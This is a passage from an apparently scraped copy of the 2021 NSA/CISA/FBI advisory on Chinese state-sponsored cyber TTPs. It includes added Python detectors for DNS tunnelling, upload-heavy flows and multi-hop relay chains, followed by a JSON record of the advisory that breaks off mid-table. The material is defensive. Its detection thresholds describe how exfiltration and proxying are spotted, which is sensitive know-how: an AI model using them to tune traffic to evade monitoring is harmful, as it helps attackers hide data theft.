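"""Heuristics for DNS tunnelling (dns2tcp-style) and lopsided client uploads.

Constructed example for this advisory (not the advisory's own code). Records,
thresholds and the registered-domain simplification are assumptions.
"""
import base64
import hashlib
import math
from collections import defaultdict


def entropy(s):
    """Shannon entropy in bits per character of a string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def registered_domain(qname):
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])   # simplification: no public-suffix list


def dns_tunnel_candidates(queries, min_queries=5, min_len=30, min_entropy=3.5, min_unique=0.9):
    """Group queries per (client, domain) and flag groups whose subdomains look like
    encoded payload: long, high-entropy and almost never repeated."""
    groups = defaultdict(list)
    for q in queries:
        groups[(q["client"], registered_domain(q["qname"]))].append(q)
    out = []
    for (client, dom), qs in groups.items():
        subs = [q["qname"].rstrip(".").lower()[: -len(dom) - 1] for q in qs]
        subs = [s for s in subs if s]
        if len(subs) < min_queries:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(entropy(s.replace(".", "")) for s in subs) / len(subs)
        unique = len(set(subs)) / len(subs)
        rare = sum(q["qtype"] in ("TXT", "NULL", "CNAME") for q in qs) / len(qs)
        if avg_len >= min_len and avg_ent >= min_entropy and unique >= min_unique:
            out.append({"client": client, "domain": dom, "queries": len(qs), "avg_len": round(avg_len, 1),
                        "avg_entropy": round(avg_ent, 2), "rare_qtype_ratio": round(rare, 2)})
    return out


def upload_heavy_flows(flows, min_bytes=1_000_000, ratio=5.0):
    """The advisory's 'client sending significantly more than it receives' check."""
    return [f for f in flows
            if f["bytes_out"] >= min_bytes and f["bytes_out"] >= ratio * max(f["bytes_in"], 1)]


def _chunk(i):
    """Constructed stand-in for a base32-encoded payload chunk carried in a query name."""
    return base64.b32encode(hashlib.sha256(f"chunk{i}".encode()).digest()[:20]).decode().lower()


SAMPLE_QUERIES = (  # constructed: six tunnel-looking TXT queries, six ordinary lookups
    [{"client": "10.20.4.17", "qname": f"{_chunk(i)}.t1.example.net", "qtype": "TXT"} for i in range(6)]
    + [{"client": "10.20.4.33", "qname": n, "qtype": "A"} for n in
       ["www.example.com", "www.example.com", "mail.example.com",
        "cdn.example.com", "login.example.com", "www.example.com"]]
)
SAMPLE_FLOWS = [  # constructed: bytes_out is client -> server
    {"src": "10.20.4.17", "dst": "203.0.113.45", "bytes_out": 48_000_000, "bytes_in": 2_100_000},
    {"src": "10.20.4.33", "dst": "198.51.100.7", "bytes_out": 120_000, "bytes_in": 4_500_000},
    {"src": "10.20.4.40", "dst": "198.51.100.9", "bytes_out": 3_000_000, "bytes_in": 900_000},
]

if __name__ == "__main__":
    for c in dns_tunnel_candidates(SAMPLE_QUERIES):
        print("dns tunnel candidate:", c)
    for f in upload_heavy_flows(SAMPLE_FLOWS):
        print("upload-heavy flow:", f["src"], "->", f["dst"])
```

Both functions are meant to run over an hour or a day of records at a time: the DNS heuristic needs enough queries per client and domain to average out, and the byte-ratio check needs long enough flows for a large `bytes_out` to be meaningful rather than a single file upload.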
Proxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]:
* Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]
|
Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.
|
* Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.
* Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.
* Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.
|
Detect:
* Network Traffic Analysis
* Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]
* Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]
Isolate:
* Network Isolation
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
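The following is an added example and not part of the advisory: a Python implementation of the relay pattern analysis listed above, which looks for a device that accepts a connection and immediately opens a second one onward with a matching byte profile, and suppresses links that the device configuration marks as authorized VPN endpoints. The flow records (start and end times plus byte counts in each direction), the timing window, the byte tolerance and the authorized-tunnel list are assumptions.

```python
"""Relay pattern analysis: a host that receives a connection and immediately opens a
matching one onward is acting as a hop in a multi-hop proxy chain.

Constructed example for this advisory (not the advisory's own code). Flow records
carry start/end times and byte counts per direction (bytes_fwd = src -> dst,
bytes_rev = dst -> src); records, window, tolerance and the authorised list are
assumptions.
"""
from collections import defaultdict


def _close(a, b, tol):
    return abs(a - b) <= tol * max(a, b, 1)


def find_relays(flows, start_window=5.0, tolerance=0.25, authorized=frozenset()):
    """Return (origin, hop, next_hop) triples where hop forwards origin's traffic onward.

    authorized: {(src, dst)} pairs that the device configuration says are legitimate
    VPN or tunnel endpoints; chains through those links are not reported.
    """
    inbound = defaultdict(list)            # flows keyed by the host that received them
    for f in flows:
        inbound[f["dst"]].append(f)
    relays = []
    for out in flows:                      # candidate second leg: hop -> next
        hop = out["src"]
        for inn in inbound.get(hop, []):   # candidate first leg: origin -> hop
            if inn["src"] == out["dst"]:   # same peer both ways is a normal two-way session
                continue
            if not 0 <= out["start"] - inn["start"] <= start_window:
                continue                   # second leg must open right after the first
            if out["end"] < inn["start"] or inn["end"] < out["start"]:
                continue                   # the two legs must overlap in time
            # Bytes that came in from the origin should go out to the next hop, and vice versa
            if not (_close(inn["bytes_fwd"], out["bytes_fwd"], tolerance)
                    and _close(inn["bytes_rev"], out["bytes_rev"], tolerance)):
                continue
            if (inn["src"], hop) in authorized or (hop, out["dst"]) in authorized:
                continue
            relays.append((inn["src"], hop, out["dst"]))
    return relays


SAMPLE_FLOWS = [  # constructed; times are seconds
    # external VPS -> branch router, then router -> internal workstation with the same byte profile
    {"src": "203.0.113.45", "dst": "10.200.0.1", "dport": 443, "start": 100.0, "end": 160.0,
     "bytes_fwd": 52_000, "bytes_rev": 410_000},
    {"src": "10.200.0.1", "dst": "10.20.4.17", "dport": 8443, "start": 100.4, "end": 159.8,
     "bytes_fwd": 51_200, "bytes_rev": 405_500},
    # unrelated file share traffic
    {"src": "10.20.4.33", "dst": "10.0.1.5", "dport": 445, "start": 100.2, "end": 101.0,
     "bytes_fwd": 9_000, "bytes_rev": 12_000},
    # the router's configured site-to-site VPN: long-lived, different byte profile
    {"src": "10.200.0.1", "dst": "198.51.100.7", "dport": 1194, "start": 100.2, "end": 900.0,
     "bytes_fwd": 2_000_000, "bytes_rev": 2_100_000},
]
AUTHORIZED_TUNNELS = frozenset({("10.200.0.1", "198.51.100.7")})

if __name__ == "__main__":
    for origin, hop, nxt in find_relays(SAMPLE_FLOWS, authorized=AUTHORIZED_TUNNELS):
        print(f"relay candidate: {origin} -> {hop} -> {nxt}")
```

The byte comparison is what separates a relay from a router simply being busy: the configured VPN leg in the sample starts in the same window as the inbound VPS connection but carries forty times the bytes, so it is never paired. Encrypted payloads cannot be inspected, but their sizes and timing still correlate across the two legs.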
### Appendix B: MITRE ATT&CK Framework

_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>))_
### Contact Information
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).
For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>).
Media Inquiries / Press Desk:
• NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>)
• CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>)
• FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)
### References
[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)
### Revisions
July 19, 2021: Initial Version
{"id": "AA21-200B", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. 
This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. 
**Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. 
A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. 
SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. 
Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. 
\u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. 
\n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. 
Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. 
If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. 
\n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. 
\nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. 
For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. 
\nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). 
Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. 
The cyber actors used or modified public proof-of-concept code to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet-accessible web servers with small web shell code injections written for multiple languages and file types, including `net`, `asp`, `aspx`, `php`, `jspx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage 